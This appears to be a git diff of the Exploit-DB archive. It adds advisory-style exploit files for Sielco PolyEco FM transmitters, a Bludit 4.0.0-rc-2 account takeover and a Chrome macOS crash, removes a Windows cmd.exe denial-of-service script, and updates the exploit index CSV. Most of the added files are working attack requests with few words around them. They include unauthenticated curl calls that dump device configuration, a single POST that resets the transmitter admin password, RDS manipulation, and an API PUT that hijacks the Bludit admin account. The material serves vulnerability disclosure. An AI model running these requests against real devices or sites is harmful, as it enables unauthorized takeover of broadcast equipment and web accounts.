Vendor: Sielco S.r.l
Product web page: https://www.sielco.org
Affected version: PolyEco1000 CPU:2.0.6 FPGA:10.19
PolyEco1000 CPU:1.9.4 FPGA:10.19
PolyEco1000 CPU:1.9.3 FPGA:10.19
PolyEco500 CPU:1.7.0 FPGA:10.16
PolyEco300 CPU:2.0.2 FPGA:10.19
PolyEco300 CPU:2.0.0 FPGA:10.19
Summary: PolyEco is the innovative family of high-end digital
FM transmitters of Sielco. They are especially suited as high
performance power system exciters or compact low-mid power
transmitters. The same cabinet may in fact be fitted with 50,
100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500,
1000).
All features can be controlled via the large touch-screen display
4.3" or remotely. Many advanced features are inside by default
in the basic version such as: stereo and RDS encoder, audio
change-over, remote-control via LAN and SNMP, "FFT" spectral
analysis of the audio sources, SFN synchronization and much more.
Desc: Improper access control occurs when the application provides
direct access to objects based on user-supplied input. As a result
of this vulnerability attackers can bypass authorization and access
resources behind protected pages. The application interface allows
users to perform certain actions via HTTP requests without performing
any validity checks to verify the requests. This can be exploited
to perform certain actions and manipulate the RDS text display.
Tested on: lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Macedonian Information Security Research and Development Laboratory
Zero Science Lab - https://www.zeroscience.mk - @zeroscience
Advisory ID: ZSL-2023-5767
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5767.php
26.01.2023
--
POST /protect/rds.htm HTTP/1.1
Host: RADIOFM
rds_inta=1
rds_intb=0
rds_pi=381
rds_ps=ZSL
rds_rta=www.zeroscience.mk
rds_rtb
rds_rtt=0
rds_tp=0
rds_tp=1
rds_ta=0
rds_ms=0
rds_pty=4
rds_ptyn=
rds_ecc=00
rds_ct=0
rds_level=90
rds_psd=0
rds_psd1
rds_pst1=0
rds_psd5
rds_pst5=0
rds_psd2
rds_pst2=0
rds_psd6
rds_pst6=0
rds_psd3
rds_pst3=0
rds_psd7
rds_pst7=0
rds_psd4
rds_pst4=0
rds_psd8
rds_pst8=0
rds_di_pty=0
rds_di_cmp=0
rds_di_cmp=1
rds_di_st=0
rds_di_art=0
rds_di_art=1
a0=90
a1=9
a2=26
a3=115
a4=0
a5=0
a6=0
a7=0
a8=0
a9=0
a10=0
a11=0
a12=0
a13=0
a14=0
a15=0
a16=0
a17=0
a18=0
a19=0
a20=0
a21=0
a22=0
a23=0
a24=0

67
exploits/hardware/webapps/51370.txt Normal file
View file

@ -0,0 +1,67 @@
## Exploit Title: Sielco PolyEco Digital FM Transmitter 2.0.6 - Unauthenticated Information Disclosure
## Exploit Author: LiquidWorm
Vendor: Sielco S.r.l
Product web page: https://www.sielco.org
Affected version: PolyEco1000 CPU:2.0.6 FPGA:10.19
PolyEco1000 CPU:1.9.4 FPGA:10.19
PolyEco1000 CPU:1.9.3 FPGA:10.19
PolyEco500 CPU:1.7.0 FPGA:10.16
PolyEco300 CPU:2.0.2 FPGA:10.19
PolyEco300 CPU:2.0.0 FPGA:10.19
Summary: PolyEco is the innovative family of high-end digital
FM transmitters of Sielco. They are especially suited as high
performance power system exciters or compact low-mid power
transmitters. The same cabinet may in fact be fitted with 50,
100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500,
1000).
All features can be controlled via the large touch-screen display
4.3" or remotely. Many advanced features are inside by default
in the basic version such as: stereo and RDS encoder, audio
change-over, remote-control via LAN and SNMP, "FFT" spectral
analysis of the audio sources, SFN synchronization and much more.
Desc: Sielco PolyEco is affected by an information disclosure
vulnerability due to improper access control enforcement. An
unauthenticated remote attacker can exploit this, via a specially
crafted request to gain access to sensitive information.
Tested on: lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Macedonian Information Security Research and Development Laboratory
Zero Science Lab - https://www.zeroscience.mk - @zeroscience
Advisory ID: ZSL-2023-5766
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5766.php
26.01.2023
--
$ curl -s http://RADIOFM/factory.ssi
$ curl -s http://RADIOFM/rds.ssi
$ curl -s http://RADIOFM/ip.ssi
$ curl -s http://RADIOFM/alarm.ssi
$ curl -s http://RADIOFM/i2s.ssi
$ curl -s http://RADIOFM/time.ssi
$ curl -s http://RADIOFM/fft.ssi
$ curl -s http://RADIOFM/info.ssi
$ curl -s http://RADIOFM/status.ssi
$ curl -s http://RADIOFM/statusx.ssi
$ curl -s http://RADIOFM/audio.ssi
$ curl -s http://RADIOFM/smtp.ssi
$ curl -s http://RADIOFM/rf.ssi
$ curl -s http://RADIOFM/rfa.ssi
$ curl -s http://RADIOFM/ping.ssi
$ curl -s http://RADIOFM/lan.ssi
$ curl -s http://RADIOFM/kappa.ssi
$ curl -s http://RADIOFM/dbrt.ssi
$ curl -s http://RADIOFM/audiom.ssi
$ curl -s http://RADIOFM/log.ssi

54
exploits/hardware/webapps/51371.txt Normal file
View file

@ -0,0 +1,54 @@
## Exploit Title: Sielco PolyEco Digital FM Transmitter 2.0.6 - Account Takeover / Lockout / EoP
## Exploit Author: LiquidWorm
Vendor: Sielco S.r.l
Product web page: https://www.sielco.org
Affected version: PolyEco1000 CPU:2.0.6 FPGA:10.19
PolyEco1000 CPU:1.9.4 FPGA:10.19
PolyEco1000 CPU:1.9.3 FPGA:10.19
PolyEco500 CPU:1.7.0 FPGA:10.16
PolyEco300 CPU:2.0.2 FPGA:10.19
PolyEco300 CPU:2.0.0 FPGA:10.19
Summary: PolyEco is the innovative family of high-end digital
FM transmitters of Sielco. They are especially suited as high
performance power system exciters or compact low-mid power
transmitters. The same cabinet may in fact be fitted with 50,
100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500,
1000).
All features can be controlled via the large touch-screen display
4.3" or remotely. Many advanced features are inside by default
in the basic version such as: stereo and RDS encoder, audio
change-over, remote-control via LAN and SNMP, "FFT" spectral
analysis of the audio sources, SFN synchronization and much more.
Desc: The application suffers from an authentication bypass,
account takeover/lockout and elevation of privileges vulnerability
that can be triggered by directly calling the users object and
effectively modifying the password of the two constants user/role
(user/admin). This can be exploited by an unauthenticated adversary
by issuing a single POST request to the vulnerable endpoint and
gain unauthorized access to the affected device with administrative
privileges.
Tested on: lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Macedonian Information Security Research and Development Laboratory
Zero Science Lab - https://www.zeroscience.mk - @zeroscience
Advisory ID: ZSL-2023-5765
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5765.php
26.01.2023
--
# Change admin pwd
$ curl -X POST -F "pwd_admin=t00t" -F "pwd_user=" http://RADIOFM/protect/users.htm

319
exploits/macos/local/51361.txt Normal file
View file

@ -0,0 +1,319 @@
## Exploit Title: Google Chrome Browser 111.0.5563.64 - AXPlatformNodeCocoa Fatal OOM/Crash (macOS)
## Exploit Author: LiquidWorm
Vendor: Google LLC
Product web page: https://www.google.com
Affected version: 111.0.5563.64 (Official Build) (x86_64)
110.0.5481.100 (Official Build) (x86_64)
108.0.5359.124 (Official Build) (x86_64)
108.0.5359.98 (Official Build) (x86_64)
Fixed version: 112.0.5615.49 (Official Build) (x86_64)
Summary: Google Chrome browser is a free web browser used for
accessing the internet and running web-based applications. The
Google Chrome browser is based on the open source Chromium web
browser project. Google released Chrome in 2008 and issues several
updates a year.
Desc: Fatal OOM/crash of Chrome browser while detaching/attaching
tabs on macOS.
Commit fix:
"The original cl landed many months ago, but
chrome/browser/ui/views/frame/browser_non_client_frame_view_mac.mm
is the only change that didn't revert cleanly."
macOS a11y: Implement accessibilityHitTest for remote app shims (PWAs)
Implements accessibility hit testing for RemoteCocoa so that Hover Text
and VoiceOver mouse mode can read the accessible objects under the
user's pointer. Cross-process plumbing was needed because RemoteCocoa
bridges to native controls in a separate app shim process and must
report accessibility trees from the browser process via the
undocumented NSAccessibilityRemoteUIElement mechanism.
This CL does the following:
1. Unblocks remote accessibilityHitTest by calling setRemoteUIApp:YES
in the browser process. This enables the browser process to accept
redirected accessibilityHitTest calls to the object corresponding to
any NSAccessibilityRemoteUIElement returned by the original
accessibilityHitTest at the app shim process.
2. (For Browser UI) Overrides NativeWidgetMacNSWindowTitledFrame's
accessibilityHitTest to have a custom implementation with
NSAccessibilityRemoteUIElement support so that custom window
controls can be found. Additionally, adjusts the BrowserView bounds
so that AXPlatformNodeCocoa's accessibilityHitTest (which doesn't
support view targeting) can return controls in the web app frame
toolbar.
3. (For Web Content) Implements RenderWidgetHostViewCocoa's
accessibilityHitTest for instances in the app shim to return a
NSAccessibilityRemoteUIElement corresponding to their counterparts
in the browser process so that web content objects can be found.
Tested on: macOS 12.6.1 (Monterey)
macOS 13.3.1 (Ventura)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2023-5770
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5770.php
08.12.2022
--
UI PoC:
-------
1. Grab a tab and detach it.
2. Bring back the tab.
3. Do this 2-3 times attaching / re-attaching the tab.
4. Chrome will hang (100% CPU) / Out-of-Memory (OOM) for 7-8 minutes.
5. Process crashes entirely.
Ref: Issue 1400682 (Ticket created: Dec 13, 2022)
Ref: https://bugs.chromium.org/p/chromium/issues/detail?id=1400682
Ref: https://chromium-review.googlesource.com/c/chromium/src/+/3861171
Ref: axtester.mm terminal PoC by xi.ch...@gmail.com (https://bugs.chromium.org/u/161486905)
=============
//
// Copyright (c) Microsoft Corporation. All rights reserved.
//
#include <ApplicationServices/ApplicationServices.h>
#include <iostream>
#include <sstream>
#include <vector>
__BEGIN_DECLS
// NOLINTNEXTLINE
AXError _AXUIElementGetWindow(AXUIElementRef, CGWindowID *);
// NOLINTNEXTLINE
CFTypeID AXTextMarkerGetTypeID();
__END_DECLS
std::ostream& bold_on(std::ostream& os)
{
if (isatty(STDOUT_FILENO))
{
return os << "\e[1m";
}
return os;
}
std::ostream& bold_off(std::ostream& os)
{
if (isatty(STDOUT_FILENO))
{
return os << "\e[0m";
}
return os;
}
std::string from_cfstr(CFTypeRef cf_ref)
{
if (cf_ref != nullptr && CFGetTypeID(cf_ref) == CFStringGetTypeID())
{
const auto cf_str = static_cast<CFStringRef>(cf_ref);
const auto max_length = static_cast<size_t>(CFStringGetMaximumSizeForEncoding(
CFStringGetLength(cf_str), kCFStringEncodingUTF8)) + 1;
auto result = std::string(max_length, '\0');
if (CFStringGetCString(cf_str, result.data(), static_cast<CFIndex>(max_length), kCFStringEncodingUTF8))
{
if (const auto pos = result.find('\0'); pos != std::string::npos)
{
result.resize(pos);
}
return result;
}
}
return {};
}
std::string ax_element_id(AXUIElementRef value)
{
// AX element cache - AX elements are backed by CFData
// (referring to 'remote' AX objects) and this data is
// 'stable' across 'volatile' instances of AXUIElement.
// 'hash and equality' of AX elements are based on this
// data and therefore, we can use AXUIElement objects as
// 'keys' in a dictionary with values, identifying these
// objects (uniquely).
const static auto ax_elements = CFDictionaryCreateMutable(kCFAllocatorDefault, 0,
&kCFTypeDictionaryKeyCallBacks, &kCFTypeDictionaryValueCallBacks);
auto ax_id = CFDictionaryGetValue(ax_elements, value);
if (ax_id == nullptr)
{
if (const auto uuid = CFUUIDCreate(kCFAllocatorDefault))
{
if (const auto uuid_s = CFUUIDCreateString(kCFAllocatorDefault, uuid))
{
CFDictionarySetValue(ax_elements, value, uuid_s);
CFRelease(uuid_s);
}
CFRelease(uuid);
}
ax_id = CFDictionaryGetValue(ax_elements, value);
}
return from_cfstr(ax_id);
}
template <typename T>
T ax_attribute_value(AXUIElementRef e, CFStringRef name)
{
if (e != nullptr)
{
auto ref = T{};
if (AXUIElementCopyAttributeValue(e, name, (CFTypeRef *) &ref) == kAXErrorSuccess)
{
return ref;
}
}
return nullptr;
}
// NOLINTNEXTLINE
void ax_traverse(AXUIElementRef elem, uint32_t depth)
{
const auto max_depth = 10;
if (depth > max_depth)
{
return;
}
const auto indent = [&]()
{
for (auto x = 0; x < depth; x++)
{
std::cout << " ";
}
};
auto wid = CGWindowID{};
if (_AXUIElementGetWindow(elem, &wid) != kAXErrorSuccess)
{
wid = 0;
}
indent();
const auto role = ax_attribute_value<CFTypeRef>(elem, kAXRoleAttribute);
std::cout << bold_on << "[*** DEPTH: " << depth << ", ROLE: " << from_cfstr(role) <<
", ID: " << ax_element_id(elem) << ", WINDOW: " << wid << " ***]" << bold_off <<
std::endl;
if (const auto children = ax_attribute_value<CFArrayRef>(elem, kAXChildrenAttribute))
{
for (CFIndex idx = 0; idx < CFArrayGetCount(children); idx++)
{
const auto element = static_cast<AXUIElementRef>(CFArrayGetValueAtIndex(children, idx));
ax_traverse(element, depth + 1);
}
CFRelease(children);
}
}
int main(int argc, char* const argv[])
{
auto pid = 0;
if (argc > 1)
{
if (!AXIsProcessTrusted())
{
std::cerr << "Please 'AX approve' Terminal in System Preferences" << std::endl;
exit(1); // NOLINT
}
// NOLINTNEXTLINE
pid = std::stoi(argv[1]);
}
else
{
std::cerr << "usage: axtester <pid>" << std::endl;
exit(1); // NOLINT
}
if (const auto app = AXUIElementCreateApplication(pid))
{
auto observer = AXObserverRef{};
auto ret = AXObserverCreate(pid, [](auto /*unused*/, AXUIElementRef /*unused*/, CFStringRef name, auto ctx)
{
auto myapp = (__AXUIElement*)(ctx);
auto hint = CFStringGetCStringPtr(name,kCFStringEncodingUTF8);
std::cout << "Hint: " << hint << std::endl;
ax_traverse(myapp, 0);
}, &observer);
if (kAXErrorSuccess != ret)
{
std::cerr << "Fail to create observer" << std::endl;
return -1;
}
std::cout << "title:" << AXObserverAddNotification(observer, app, kAXTitleChangedNotification, (void*)app) << std::endl;
std::cout << "focus_window:" << AXObserverAddNotification(observer, app, kAXFocusedWindowChangedNotification, (void*)app) << std::endl;
std::cout << "focus_element:" << AXObserverAddNotification(observer, app, kAXFocusedUIElementChangedNotification, (void*)app) << std::endl;
std::cout << "move:" << AXObserverAddNotification(observer, app, kAXWindowMovedNotification, (void*)app) << std::endl;
std::cout << "resize:" << AXObserverAddNotification(observer, app, kAXWindowResizedNotification, (void*)app) << std::endl;
std::cout << "deminiaturized:" << AXObserverAddNotification(observer, app, kAXWindowDeminiaturizedNotification, (void*)app) << std::endl;
std::cout << "miniaturize:" << AXObserverAddNotification(observer, app, kAXWindowMiniaturizedNotification, (void*)app) << std::endl;
CFRunLoopAddSource(CFRunLoopGetCurrent(), AXObserverGetRunLoopSource(observer), kCFRunLoopDefaultMode);
CFRunLoopRun();
}
return 0;
}
--codeaibot explains--
This is a C++ program that uses the Accessibility API (AX) provided
by macOS to traverse the user interface of a running application and
print out information about the accessibility elements that it finds.
The program takes a single argument, which is the process ID (PID) of
the application to examine. If no argument is provided, the program
displays a usage message and exits.
The main() function first checks if the Terminal app has been granted
accessibility privileges by calling the AXIsProcessTrusted() function.
If it hasn't, the program displays an error message and exits.
If the Terminal app has been granted accessibility privileges, the program
creates an AXUIElementRef object for the application using the AXUIElementCreateApplication()
function, passing in the PID as an argument.
The ax_traverse() function is then called with the root accessibility
element of the application as an argument. This function recursively
traverses the accessibility tree of the application, printing out
information about each element it encounters.
The program also defines several helper functions for working with Core
Foundation types (from_cfstr(), ax_element_id(), and ax_attribute_value()),
as well as some functions for printing formatted output to the console
(bold_on() and bold_off()).
-- / --
As this issue is not a security issue nor results in security consequences,
this report is not eligible for a VRP reward.
++
Thank you Amy!
--

90
exploits/php/webapps/51360.txt Normal file
View file

@ -0,0 +1,90 @@
## Exploit Title: Bludit 4.0.0-rc-2 - Account takeover
## Author: nu11secur1ty
## Date: 04.11.2013
## Vendor: https://www.bludit.com/
## Software: https://github.com/bludit/bludit/releases/tag/4.0.0-rc-2
## Reference: https://www.cloudflare.com/learning/access-management/account-takeover/
## Reference: https://portswigger.net/daily-swig/facebook-account-takeover-researcher-scoops-40k-bug-bounty-for-chained-exploit
## Description:
The already authenticated attacker can send a normal request to change
his password and then he can use
the same JSON `object` and the vulnerable `API token KEY` in the same
request to change the admin account password.
Then he can access the admin account and he can do very malicious stuff.
STATUS: HIGH Vulnerability
[+]Exploit:
```PUT
PUT /api/users/admin HTTP/1.1
Host: 127.0.0.1:8000
Content-Length: 138
sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"
sec-ch-ua-platform: "Windows"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.50
Safari/537.36
content-type: application/json
Accept: */*
Origin: http://127.0.0.1:8000
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8000/admin/edit-user/pwned
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: BLUDIT-KEY=98t31p2g0i7t6rscufuccpthui
Connection: close
{"token":"4f8df9f64e84fa4562ec3a604bf7985c","authentication":"6d1a5510a53f9d89325b0cd56a2855a9","username":"pwned","password":"password1"}
```
[+]Response:
```HTTP
HTTP/1.1 200 OK
Host: 127.0.0.1:8000
Date: Tue, 11 Apr 2023 08:33:51 GMT
Connection: close
X-Powered-By: PHP/7.4.30
Access-Control-Allow-Origin: *
Content-Type: application/json
{"status":"0","message":"User edited.","data":{"key":"admin"}}
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/bludit/2023/Bludit-v4.0.0-Release-candidate-2)
## Proof and Exploit:
[href](https://streamable.com/w3aa4d)
## Time spend:
00:57:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and
https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>

38
exploits/windows/dos/51348.txt
View file

@ -1,38 +0,0 @@
# Exploit Title: Microsoft Windows 11 - 'cmd.exe' Denial of Service
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Date: 2023-03-30
# Vendor Homepage: https://www.microsoft.com/en-us
# Software Link: https://www.microsoft.com/en-us
# Tested Version: N/A
# Tested on OS: Windows 11 Pro
# [ About App ]
Microsoft Windows is prone to a buffer-overflow vulnerability because the software fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer.
An attacker can exploit this issue to crash the affected application, denying service to legitimate users. Arbitrary code execution may be possible, but this has not been confirmed.
This issue affects Microsoft Windows 11 Pro.
Note: Further analysis reveals that this is not a vulnerability; this BID is now retired.
# [ POC ]
# 1.Run the python script, it will create a new file "PoC.txt"
# 2.Run Command Prompt
# 3.Copy the content of the file "PoC.txt"
# 4.Paste the content of dos.txt into the lin cmd.exe
# 5.Crashed ;)
#!/usr/bin/env python
buffer = "A" * 339839907
payload = buffer
try:
    f=open("PoC.txt","w")
    print "[+] Creating %s evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"

13
files_exploits.csv
View file

@ -1123,6 +1123,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
28989,exploits/asp/webapps/28989.txt,"INFINICART - 'search.asp?search' Cross-Site Scripting",2006-11-13,"laurent gaffie",webapps,asp,,2006-11-13,2013-10-16,1,CVE-2006-5958;OSVDB-30380,,,,,https://www.securityfocus.com/bid/21043/info
28990,exploits/asp/webapps/28990.txt,"INFINICART - 'sendpassword.asp?email' Cross-Site Scripting",2006-11-13,"laurent gaffie",webapps,asp,,2006-11-13,2013-10-16,1,CVE-2006-5958;OSVDB-30381,,,,,https://www.securityfocus.com/bid/21043/info
11414,exploits/asp/webapps/11414.txt,"Infragistics WebHtmlEditor 7.1 - Multiple Vulnerabilities",2010-02-12,SpeeDr00t,webapps,asp,,2010-02-11,,0,OSVDB-62338,,,,,
51362,exploits/asp/webapps/51362.txt,"InnovaStudio WYSIWYG Editor 5.4 - Unrestricted File Upload / Directory Traversal",2023-04-14,Zer0FauLT,webapps,asp,,2023-04-14,2023-04-14,0,,,,,,
29456,exploits/asp/webapps/29456.txt,"InstantASP 4.1 - 'Logon.aspx?sessionid' Cross-Site Scripting",2007-01-15,Doz,webapps,asp,,2007-01-15,2013-11-06,1,CVE-2007-0302;OSVDB-32852,,,,,https://www.securityfocus.com/bid/22052/info
29457,exploits/asp/webapps/29457.txt,"InstantASP 4.1 - 'Members1.aspx' Multiple Cross-Site Scripting Vulnerabilities",2007-01-15,Doz,webapps,asp,,2007-01-15,2013-11-06,1,CVE-2007-0302;OSVDB-32853,,,,,https://www.securityfocus.com/bid/22052/info
30963,exploits/asp/webapps/30963.txt,"InstantSoftwares Dating Site - Login SQL Injection",2007-12-31,"Aria-Security Team",webapps,asp,,2007-12-31,2014-01-15,1,CVE-2007-6671;OSVDB-39766,,,,,https://www.securityfocus.com/bid/27080/info
@ -3863,6 +3864,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
23317,exploits/hardware/remote/23317.txt,"Seyeon FlexWATCH Network Video Server 2.2 - Unauthorized Administrative Access",2003-10-31,slaizer,remote,hardware,,2003-10-31,2012-12-12,1,CVE-2003-1160;OSVDB-2842,,,,,https://www.securityfocus.com/bid/8942/info
35995,exploits/hardware/remote/35995.sh,"Shuttle Tech ADSL Modem/Router 915 WM - Remote DNS Change",2015-02-05,"Todor Donev",remote,hardware,,2015-02-05,2017-09-08,0,OSVDB-118005,,,,,
40867,exploits/hardware/remote/40867.txt,"Shuttle Tech ADSL Wireless 920 WM - Multiple Vulnerabilities",2016-12-05,"Persian Hack Team",remote,hardware,,2016-12-05,2016-12-05,0,,,,,,
51366,exploits/hardware/remote/51366.txt,"Sielco Analog FM Transmitter 2.12 - Remote Privilege Escalation",2023-04-14,LiquidWorm,remote,hardware,,2023-04-14,2023-04-14,0,,,,,,
7858,exploits/hardware/remote/7858.php,"Siemens ADSL SL2-141 - Cross-Site Request Forgery",2009-01-25,spdr,remote,hardware,,2009-01-24,,1,,,,,,
24065,exploits/hardware/remote/24065.java,"Siemens S55 - Cellular Telephone Sms Confirmation Message Bypass",2004-04-27,FtR,remote,hardware,,2004-04-27,2013-01-13,1,CVE-2004-2626;OSVDB-5703,,,,,https://www.securityfocus.com/bid/10227/info
38964,exploits/hardware/remote/38964.rb,"Siemens Simatic S7 1200 - CPU Command Module (Metasploit)",2015-12-14,"Nguyen Manh Hung",remote,hardware,102,2015-12-14,2015-12-14,0,,"Metasploit Framework (MSF)",,,,
@ -4716,6 +4718,14 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
25968,exploits/hardware/webapps/25968.pl,"Seowonintech Routers fw: 2.3.9 - File Disclosure",2013-06-05,"Todor Donev",webapps,hardware,,2013-06-05,2016-12-05,0,OSVDB-94103,,,,,
44879,exploits/hardware/webapps/44879.md,"Siaberry 1.2.2 - Command Injection",2018-06-11,"Space Duck",webapps,hardware,,2018-06-12,2018-06-12,0,,,,,,https://blog.spaceduck.io/siaberry-1/
48646,exploits/hardware/webapps/48646.py,"Sickbeard 0.1 - Remote Command Injection",2020-07-07,bdrake,webapps,hardware,,2020-07-07,2020-07-07,0,,,,,,
51363,exploits/hardware/webapps/51363.txt,"Sielco Analog FM Transmitter 2.12 - 'id' Cookie Brute Force Session Hijacking",2023-04-14,LiquidWorm,webapps,hardware,,2023-04-14,2023-04-14,0,,,,,,
51364,exploits/hardware/webapps/51364.txt,"Sielco Analog FM Transmitter 2.12 - Cross-Site Request Forgery",2023-04-14,LiquidWorm,webapps,hardware,,2023-04-14,2023-04-14,0,,,,,,
51365,exploits/hardware/webapps/51365.txt,"Sielco Analog FM Transmitter 2.12 - Improper Access Control Change Admin Password",2023-04-14,LiquidWorm,webapps,hardware,,2023-04-14,2023-04-14,0,,,,,,
51371,exploits/hardware/webapps/51371.txt,"Sielco PolyEco Digital FM Transmitter 2.0.6 - Account Takeover / Lockout / EoP",2023-04-14,LiquidWorm,webapps,hardware,,2023-04-14,2023-04-14,0,,,,,,
51367,exploits/hardware/webapps/51367.py,"Sielco PolyEco Digital FM Transmitter 2.0.6 - Authentication Bypass Exploit",2023-04-14,LiquidWorm,webapps,hardware,,2023-04-14,2023-04-14,0,,,,,,
51368,exploits/hardware/webapps/51368.txt,"Sielco PolyEco Digital FM Transmitter 2.0.6 - Authorization Bypass Factory Reset",2023-04-14,LiquidWorm,webapps,hardware,,2023-04-14,2023-04-14,0,,,,,,
51369,exploits/hardware/webapps/51369.txt,"Sielco PolyEco Digital FM Transmitter 2.0.6 - Radio Data System POST Manipulation",2023-04-14,LiquidWorm,webapps,hardware,,2023-04-14,2023-04-14,0,,,,,,
51370,exploits/hardware/webapps/51370.txt,"Sielco PolyEco Digital FM Transmitter 2.0.6 - Unauthenticated Information Disclosure",2023-04-14,LiquidWorm,webapps,hardware,,2023-04-14,2023-04-14,0,,,,,,
25416,exploits/hardware/webapps/25416.txt,"SimpleTransfer 2.2.1 - Command Injection",2013-05-13,Vulnerability-Lab,webapps,hardware,,2013-05-13,2013-05-13,0,OSVDB-93263,,,,,https://www.vulnerability-lab.com/get_content.php?id=937
49800,exploits/hardware/webapps/49800.html,"Sipwise C5 NGCP CSC - 'Multiple' Persistent Cross-Site Scripting (XSS)",2021-04-23,LiquidWorm,webapps,hardware,,2021-04-23,2021-10-28,0,,,,,,
49801,exploits/hardware/webapps/49801.html,"Sipwise C5 NGCP CSC - Click2Dial Cross-Site Request Forgery (CSRF)",2021-04-23,LiquidWorm,webapps,hardware,,2021-04-23,2021-04-23,0,,,,,,
@ -9099,6 +9109,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
45107,exploits/macos/local/45107.txt,"Charles Proxy 4.2 - Local Privilege Escalation",2018-07-30,"Mark Wadham",local,macos,,2018-07-30,2018-07-30,0,CVE-2017-15358,Local,,,,https://m4.rkw.io/blog/cve201715358-local-root-privesc-in-charles-proxy-42.html
46724,exploits/macos/local/46724.txt,"Evernote 7.9 - Code Execution via Path Traversal",2019-04-18,"Dhiraj Mishra",local,macos,,2019-04-18,2019-04-18,0,CVE-2019-10038,Traversal,,,,https://www.inputzero.io/2019/04/evernote-cve-2019-10038.html
50696,exploits/macos/local/50696.py,"Fetch Softworks Fetch FTP Client 5.8 - Remote CPU Consumption (Denial of Service)",2022-02-02,LiquidWorm,local,macos,,2022-02-02,2022-02-02,0,,,,,,
51361,exploits/macos/local/51361.txt,"Google Chrome Browser 111.0.5563.64 - AXPlatformNodeCocoa Fatal OOM/Crash (macOS)",2023-04-14,LiquidWorm,local,macos,,2023-04-14,2023-04-14,0,,,,,,
44307,exploits/macos/local/44307.m,"Google Software Updater macOS - Unsafe use of Distributed Objects Privilege Escalation",2018-03-20,"Google Security Research",local,macos,,2018-03-20,2018-03-20,1,CVE-2018-6084,Local,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1486
43224,exploits/macos/local/43224.sh,"Hashicorp vagrant-vmware-fusion 4.0.23 - Local Privilege Escalation",2017-12-06,"Mark Wadham",local,macos,,2017-12-06,2017-12-06,1,CVE-2017-11741,Local,,,,https://m4.rkw.io/blog/cve201711741-local-root-privesc-in-hashicorp-vagrantvmwarefusion--4023.html
43223,exploits/macos/local/43223.sh,"Hashicorp vagrant-vmware-fusion 4.0.24 - Local Privilege Escalation",2017-12-06,"Mark Wadham",local,macos,,2017-12-06,2017-12-06,1,CVE-2017-12579,Local,,,,https://m4.rkw.io/blog/cve201712579-local-root-privesc-in-hashicorp-vagrantvmwarefusion-4024.html
@ -14836,6 +14847,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48568,exploits/php/webapps/48568.py,"Bludit 3.9.12 - Directory Traversal",2020-06-09,"Luis Vacacas",webapps,php,,2020-06-09,2020-06-09,0,CVE-2019-16113,,,,,
48942,exploits/php/webapps/48942.py,"Bludit 3.9.2 - Auth Bruteforce Bypass",2020-10-23,"Mayank Deshmukh",webapps,php,,2020-10-23,2020-11-13,1,CVE-2019-17240,,,,,
49037,exploits/php/webapps/49037.rb,"Bludit 3.9.2 - Authentication Bruteforce Bypass (Metasploit)",2020-11-13,Aporlorxl23,webapps,php,,2020-11-13,2020-11-13,1,,,,,,
51360,exploits/php/webapps/51360.txt,"Bludit 4.0.0-rc-2 - Account takeover",2023-04-14,nu11secur1ty,webapps,php,,2023-04-14,2023-04-14,0,,,,,,
46060,exploits/php/webapps/46060.txt,"bludit Pages Editor 3.0.0 - Arbitrary File Upload",2018-12-27,BouSalman,webapps,php,80,2018-12-27,2019-01-02,0,CVE-2018-1000811,,,,http://www.exploit-db.combludit-3.0.0.zip,
11360,exploits/php/webapps/11360.txt,"Blue Dove - SQL Injection",2010-02-08,HackXBack,webapps,php,,2010-02-07,,0,,,,,,
7797,exploits/php/webapps/7797.php,"Blue Eye CMS 1.0.0 - 'clanek' Blind SQL Injection",2009-01-15,darkjoker,webapps,php,,2009-01-14,2017-01-17,1,OSVDB-51769;CVE-2009-0425,,,,,
@ -37231,7 +37243,6 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
